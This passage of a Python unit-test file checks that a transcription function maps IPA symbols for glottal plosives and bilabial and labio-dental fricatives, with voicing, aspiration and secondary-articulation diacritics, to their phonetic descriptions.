def test_ʔ̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ʷ")
self.assertEqual(actual, expected)
def test_ʔ̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized glottal plosive pulmonic egressive consonant
def test_ʔʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʲ")
self.assertEqual(actual, expected)
def test_ʔ̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ʲ")
self.assertEqual(actual, expected)
def test_ʔ̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized glottal plosive pulmonic egressive consonant
def test_ʔˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔˠ")
self.assertEqual(actual, expected)
def test_ʔ̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ˠ")
self.assertEqual(actual, expected)
def test_ʔ̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔˤ")
self.assertEqual(actual, expected)
def test_ʔ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ˤ")
self.assertEqual(actual, expected)
def test_ʔ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated glottal plosive pulmonic egressive consonant
def test_ʔʰ_is_the_representation_of_the_voiceless_aspirated_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized glottal plosive pulmonic egressive consonant
def test_ʔʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized glottal plosive pulmonic egressive consonant
def test_ʔʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized glottal plosive pulmonic egressive consonant
def test_ʔʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰˤ")
self.assertEqual(actual, expected)
# voiced glottal plosive pulmonic egressive consonant
def test_ʔ̬_is_the_representation_of_the_voiced_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬")
self.assertEqual(actual, expected)
def test_ʔ̬_is_the_representation_of_the_voiced_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬")
self.assertEqual(actual, expected)
# voiced labialized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʷ")
self.assertEqual(actual, expected)
def test_ʔ̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʲ")
self.assertEqual(actual, expected)
def test_ʔ̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized glottal plosive pulmonic egressive consonant
def test_ʔ̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˠ")
self.assertEqual(actual, expected)
def test_ʔ̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˤ")
self.assertEqual(actual, expected)
def test_ʔ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless bilabial fricative pulmonic egressive consonant
def test_ɸ_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ")
self.assertEqual(actual, expected)
def test_ɸ̊_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊")
self.assertEqual(actual, expected)
def test_ɸ̥_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥")
self.assertEqual(actual, expected)
def test_β̊_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊")
self.assertEqual(actual, expected)
def test_β̥_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial fricative pulmonic egressive consonant
def test_ɸʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʷ")
self.assertEqual(actual, expected)
def test_ɸ̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ʷ")
self.assertEqual(actual, expected)
def test_ɸ̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ʷ")
self.assertEqual(actual, expected)
def test_β̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʷ")
self.assertEqual(actual, expected)
def test_β̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial fricative pulmonic egressive consonant
def test_ɸʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʲ")
self.assertEqual(actual, expected)
def test_ɸ̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ʲ")
self.assertEqual(actual, expected)
def test_ɸ̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ʲ")
self.assertEqual(actual, expected)
def test_β̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʲ")
self.assertEqual(actual, expected)
def test_β̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial fricative pulmonic egressive consonant
def test_ɸˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸˠ")
self.assertEqual(actual, expected)
def test_ɸ̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ˠ")
self.assertEqual(actual, expected)
def test_ɸ̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ˠ")
self.assertEqual(actual, expected)
def test_β̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ˠ")
self.assertEqual(actual, expected)
def test_β̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial fricative pulmonic egressive consonant
def test_ɸˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸˤ")
self.assertEqual(actual, expected)
def test_ɸ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ˤ")
self.assertEqual(actual, expected)
def test_ɸ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ˤ")
self.assertEqual(actual, expected)
def test_β̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ˤ")
self.assertEqual(actual, expected)
def test_β̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial fricative pulmonic egressive consonant
def test_ɸʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰ")
self.assertEqual(actual, expected)
def test_β̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰ")
self.assertEqual(actual, expected)
def test_β̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial fricative pulmonic egressive consonant
def test_ɸʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰʷ")
self.assertEqual(actual, expected)
def test_β̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰʷ")
self.assertEqual(actual, expected)
def test_β̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant
def test_ɸʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰʲ")
self.assertEqual(actual, expected)
def test_β̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰʲ")
self.assertEqual(actual, expected)
def test_β̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial fricative pulmonic egressive consonant
def test_ɸʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰˠ")
self.assertEqual(actual, expected)
def test_β̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰˠ")
self.assertEqual(actual, expected)
def test_β̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant
def test_ɸʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰˤ")
self.assertEqual(actual, expected)
def test_β̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰˤ")
self.assertEqual(actual, expected)
def test_β̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial fricative pulmonic egressive consonant
def test_β_is_the_representation_of_the_voiced_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β")
self.assertEqual(actual, expected)
def test_ɸ̬_is_the_representation_of_the_voiced_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬")
self.assertEqual(actual, expected)
def test_ɸ̬_is_the_representation_of_the_voiced_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬")
self.assertEqual(actual, expected)
# voiced labialized bilabial fricative pulmonic egressive consonant
def test_βʷ_is_the_representation_of_the_voiced_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʷ")
self.assertEqual(actual, expected)
def test_ɸ̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʷ")
self.assertEqual(actual, expected)
def test_ɸ̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial fricative pulmonic egressive consonant
def test_βʲ_is_the_representation_of_the_voiced_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʲ")
self.assertEqual(actual, expected)
def test_ɸ̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʲ")
self.assertEqual(actual, expected)
def test_ɸ̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial fricative pulmonic egressive consonant
def test_βˠ_is_the_representation_of_the_voiced_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βˠ")
self.assertEqual(actual, expected)
def test_ɸ̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˠ")
self.assertEqual(actual, expected)
def test_ɸ̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial fricative pulmonic egressive consonant
def test_βˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βˤ")
self.assertEqual(actual, expected)
def test_ɸ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˤ")
self.assertEqual(actual, expected)
def test_ɸ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial fricative pulmonic egressive consonant
def test_βʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰ")
self.assertEqual(actual, expected)
def test_β̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial fricative pulmonic egressive consonant
def test_βʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰʷ")
self.assertEqual(actual, expected)
def test_β̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial fricative pulmonic egressive consonant
def test_βʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰʲ")
self.assertEqual(actual, expected)
def test_β̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial fricative pulmonic egressive consonant
def test_βʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰˠ")
self.assertEqual(actual, expected)
def test_β̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant
def test_βʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰˤ")
self.assertEqual(actual, expected)
def test_β̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labio-dental fricative pulmonic egressive consonant
def test_f_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f")
self.assertEqual(actual, expected)
def test_f̊_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊")
self.assertEqual(actual, expected)
def test_f̥_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥")
self.assertEqual(actual, expected)
def test_v̊_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊")
self.assertEqual(actual, expected)
def test_v̥_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental fricative pulmonic egressive consonant
def test_fʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʷ")
self.assertEqual(actual, expected)
def test_f̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ʷ")
self.assertEqual(actual, expected)
def test_f̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ʷ")
self.assertEqual(actual, expected)
def test_v̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʷ")
self.assertEqual(actual, expected)
